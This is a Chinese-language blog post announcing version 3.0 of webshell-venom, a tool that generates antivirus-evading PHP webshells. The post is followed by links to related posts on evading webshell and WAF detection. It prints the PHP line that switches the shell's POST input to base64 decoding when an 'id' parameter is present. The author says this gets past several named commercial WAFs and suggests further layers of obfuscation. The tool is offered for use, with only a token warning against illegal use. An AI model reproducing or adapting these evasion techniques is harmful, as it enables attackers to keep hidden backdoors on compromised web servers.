一键免杀D盾(webshell-venom 3.0 发布) ——yzddMr6
前言
我承诺过300个星后放出3.0
项目地址:
https://github.com/yzddmr6/webshell-venom
webshell-venom 3.0 更新特点:
1. 修复已知问题:宝塔在遇到header404时会解析到他的404模版上而不是shell上导致无法连接,故去除头部的404,如有需要自行添加2. 变量全员随机化,不再有固定的变量名称3. 增加流量传输编码方式并且兼容原版4. 免杀依旧,自己扫两遍就知道了
流量编码原理及使用方式:
看了很多文章甚至包括蚁剑的编码器demo里面都是用一些特定的shell来base64或者hex或者gzin的方式来绕过各种waf的流量检测
但是问题就是不兼容,麻烦,还要上不同的马
并且不好做维护,因为你的特定shell一旦成为已知样本后就相当于完全gg
3.0就解决了这个问题
其实原理很简单,就是如下的一行代码:
isset($_GET['id'])?base64_decode($_POST['mr6']):$_POST['mr6'];
如果存在id这个get的参数就把post的数据base64解密一遍
否则就直接传参
也就是说我们只要使用的时候不加id这个参数就能像一般的shell使用
需要过流量检测的时候就加个id=xxx
后面的xxx不固定,也是为了增加随机化
使用实例:
![](/assets/blank.gif)
生成测试文件test.php
直接明文post
![](/assets/blank.gif)
加入id参数后base64传参
![](/assets/blank.gif)
用蚁剑连接的话就用官方的base64_bypass编码器
抓个流量
![](/assets/blank.gif)
后言
经过测试把参数全部base64后可以绕过某里云 某锁 某狗 某塔,基本上够用了
如果想要gzin或者hex传输请自己修改
base64只是个参考如果觉得一层不够可以多加几层混淆
这个就需要你自己动手了
最后的最后
更新免杀不易,且用且珍惜
还请大家多多支持
禁止用于非法用途!
一键免杀D盾(webshell-venom 3.0 发布) ——yzddMr6相关推荐
- [视频]K8飞刀 一键免杀 IE神洞网马教程
[视频]K8飞刀 一键免杀 IE神洞网马教程 https://pan.baidu.com/s/16ZrTs 转载于:https://www.cnblogs.com/k8gege/p/10474295. ...
- 对于脚本木马的免杀(特别针对安全狗的V3.0)的经验副过狗菜刀
关于脚本木马的免杀(针对安全狗的V3.0)经验 安全狗3.0默认忽略大于1048576字节即1M的文件(如图). 至于怎么把木马弄成大于1M,你应该懂的. 另外,脚本文件只是在初次请求时进行编译,如果 ...
- TideSec远控免杀学习三(Venom+Shellter)
参考链接: 利用meterpreter下的Venom免杀后门:https://www.cnblogs.com/wh4am1/p/7469625.html 免杀后门venom :https://www. ...
- sqlmap绕过d盾_WEBSHELL免杀绕过WAF思路amp;方法(一)
本文主要介绍WEBSHELL免杀绕过的思路与方法,网上很多的方法基本都被安全厂家加入了检测规则已经不能免杀,所以我们要了解我们主要对手WAF的检测技术,故基于前人优秀基础上我们需要有能力衍生出免杀马, ...
- 利用注释及自定义加密免杀Webshell
0x00:简介 此篇只讨论php,其实原理是相同的,本文的思路依然适用于其他语言 由于php7.1以后assert不能拆分了,所以此篇不使用assert函数作为核心,使用适用性更广的eval. 免杀顺 ...
- webshell之jsp免杀
webshell之jsp免杀 转载自webshell免杀研究 原理 向服务器端发送恶意代码写成的文件(即:shell),客户端通过远程连接,利用shell连接到服务器,并可对服务器进行操作. 结构 实 ...
- 浅谈PHP木马免杀之如何过狗过宝塔过阿里云D盾
PHP免杀方法有很多,加密混淆字符转换拆分等等都可以达到目的,下面来简单介绍几种免杀PHP大马的方法,一句话思路也是一样 拿我很喜欢的一款php大马来示范,这个马支持cmd命令,编辑文件不会空白,界面 ...
- PHP-Webshell免杀研究
不想当将军的士兵不是好士兵,不想getshell的Hacker不是好Hacker~ 有时候我们在做攻防对抗时经常会碰到可以上传webshell的地方,但是经常会被安全狗.D盾.护卫神.云锁等安全软件查 ...
- 云锁 php一句话,关于php一句话免杀的分析转载
一开始想这样: <?php $_GET['ts7']($_POST['cmd']);?> 客户端用菜刀,密码cmd,url为test.php?ts7=assert 这个应该算没有什 ...
最新文章
- 深度好玩!10个有趣且易上手的AI项目(附 Python 源代码)
- pytorch torch.from_numpy()(从numpy数组创建一个张量,数组和张量共享相同内存)
- .Net 零星小知识
- opengl加载显示3D模型md5mesh类型文件
- 从 6 万用户评论中,选出这 23 门全世界最好的 CS 免费课
- 类与对象 格式小结 java 1202
- 【写作技巧】中文摘要及关键词的撰写
- 周志华教授:长文详细教你如何做研究与写论文?
- 经典机器学习系列(三)【线性模型与广义线性模型】
- cmd命令入门,简单教程dos
- 24.UART串口通讯框图、波特率计算方法
- Android车载方案公司,你该何去何从?
- python象棋博弈算法_python做中国国粹——象棋
- PTA 7-2 不变初心数(15分)思路简单
- 华为的5G到底有多厉害?
- java什么是布尔型_Java新职篇:是什么是布尔型?
- [4G5G专题-91]:流程 - 4G LTE 终端移动性管理总体概述
- python-今日头条
- 13个offer,8家SSP,谈谈秋招经验
- 在OpenCV中使用Mask R-CNN